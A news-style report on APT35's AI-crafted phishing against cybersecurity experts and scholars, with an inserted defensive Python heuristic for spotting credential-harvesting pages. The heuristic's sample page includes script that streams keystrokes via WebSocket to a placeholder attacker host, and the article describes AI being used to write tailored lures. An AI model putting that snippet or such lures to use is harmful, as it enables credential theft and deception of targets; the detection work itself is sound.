AI-crafted phishing emails from Iranian hackers target cybersecurity experts and scholars worldwide
In a significant escalation of state-sponsored cyber warfare, the Iranian state-backed group APT35 (also known as Charming Kitten and Magic Hound) has launched a series of AI-enhanced phishing campaigns targeting Western nations and Israeli cyber professionals. These new tactics, which mark a fundamental transformation in APT35's operational methodology since mid-2025, are part of a broader Iranian digital retaliation strategy.
The recent campaigns, coinciding with heightened geopolitical tensions following the June 2025 Israeli and American strikes on Iranian nuclear and military facilities, exhibit several key features. APT35 employs sophisticated AI tools to generate highly polished, grammatically flawless spear-phishing emails and messages that impersonate executives, researchers, or academics within technology and cybersecurity sectors.
The campaigns focus on Israeli technology professionals, academics, journalists, and cybersecurity experts, as well as Western government, defense, and critical infrastructure organizations. Attackers send deceptive messages through email and WhatsApp that pretend to be assistants or colleagues, sometimes including fake Google Meet invitations hosted on official-looking Google Sites to increase credibility.
Victims are lured to fake Gmail or Google Meet login pages that are pre-filled with their email address to appear legitimate. These phishing pages use modern web frameworks like React and real-time data exfiltration techniques such as WebSockets to steal passwords and two-factor authentication (2FA) codes. Some also incorporate passive keylogging to capture input even if the victim abandons the process.
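As an added illustration of the page-level indicators just described (not code from the article or from any of its sources), the Python heuristic below scans the source of a suspected login page for a pre-filled identifier, a WebSocket opened to a host outside the impersonated brand's domain, keystroke listeners feeding that socket, and a 2FA code field. The sample page, its host name and its field names are constructed assumptions, not a real artifact.

```python
import re

# Constructed sample of a credential-harvesting page of the kind described
# above (not a real APT35 artifact): the identifier field is pre-filled for
# the target, a WebSocket is opened to a non-Google host, and keystroke
# listeners stream field contents before the form is ever submitted.
SAMPLE_PAGE = """
<title>Sign in - Google Accounts</title>
<form id="login">
  <input name="identifier" value="target@example.org">
  <input name="password" type="password">
  <input name="totp" placeholder="Enter 2-step verification code">
</form>
<script>
const ws = new WebSocket("wss://relay.attacker-placeholder.invalid/session");
document.querySelectorAll("input").forEach(el =>
  el.addEventListener("keyup", () => ws.send(el.name + "=" + el.value)));
</script>
"""

# Heuristic patterns; field names are assumptions based on common login forms.
PREFILLED = re.compile(r'<input[^>]*name="(?:identifier|email)"[^>]*value="[^"]+@[^"]+"', re.I)
WEBSOCKET = re.compile(r'new\s+WebSocket\(\s*["\']wss?://([^"\'/:]+)', re.I)
KEY_LISTENER = re.compile(r'addEventListener\(\s*["\'](?:keyup|keydown|keypress|input)["\']', re.I)
OTP_FIELD = re.compile(r'<input[^>]*(?:name="(?:totp|otp|code)"|verification code)', re.I)


def analyze_page(html, legitimate_suffixes=("google.com",)):
    """Return the indicators found in a page that presents itself as a Google login."""
    findings = []
    if PREFILLED.search(html):
        findings.append("prefilled_identifier")
    ws = WEBSOCKET.search(html)
    if ws:
        host = ws.group(1).lower()
        # A Google login page has no reason to open a socket to a foreign host.
        if not any(host == s or host.endswith("." + s) for s in legitimate_suffixes):
            findings.append("websocket_to_foreign_host:" + host)
        # Keystroke listeners plus a live socket indicate passive keylogging.
        if KEY_LISTENER.search(html):
            findings.append("keystroke_streaming")
    if OTP_FIELD.search(html):
        findings.append("2fa_code_collected")
    return findings


def verdict(findings):
    """Two or more independent indicators are treated as a likely harvester."""
    return "likely_credential_harvester" if len(findings) >= 2 else "inconclusive"
```

Run it over page sources captured from reported phishing URLs; a single indicator (for example a pre-filled identifier, which legitimate sites also use) is deliberately not enough for a verdict on its own.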
While earlier campaigns included delivery of malware such as the PowerStar backdoor, the recent AI-powered campaigns emphasize credential theft, although APT35 retains its ability to establish a malware foothold. The current operations blend espionage with psychological warfare, using AI-generated content to build rapport over extended periods, often spanning weeks or months, before attempting to extract sensitive information or gain unauthorized access.
The AI systems can generate content that references specific research papers, conference presentations, and industry developments relevant to the target's field of expertise, significantly increasing the likelihood of successful engagement. The emails often include subtle technical discussions about emerging cybersecurity threats or research methodologies, designed to appeal to the intellectual curiosity of cybersecurity professionals while gradually establishing trust and credibility with the intended victims.
These new tactics are a significant development in state-sponsored cyber warfare, specifically targeting the cybersecurity community's knowledge base and research capabilities. The emergence of these AI-crafted email campaigns coincides with a calculated shift toward targeting those responsible for defending against such threats.
- The security research community should be aware of the increased threat from AI-enhanced phishing campaigns by state-sponsored actors like APT35, as these operations target the knowledge base and research capabilities of cybersecurity professionals.
- The incorporation of artificial intelligence into cyberattacks, as in APT35's recent campaigns, poses a significant challenge to the field of cybersecurity: the AI systems generate content tailored to the target's field of expertise to sustain long-term engagement and extract information.
- In light of escalating cyber warfare tactics such as the AI-powered phishing campaigns of state-sponsored groups like APT35, governments, technology companies, and general news outlets need to pay closer attention to the political implications and take the necessary measures to bolster cybersecurity defenses.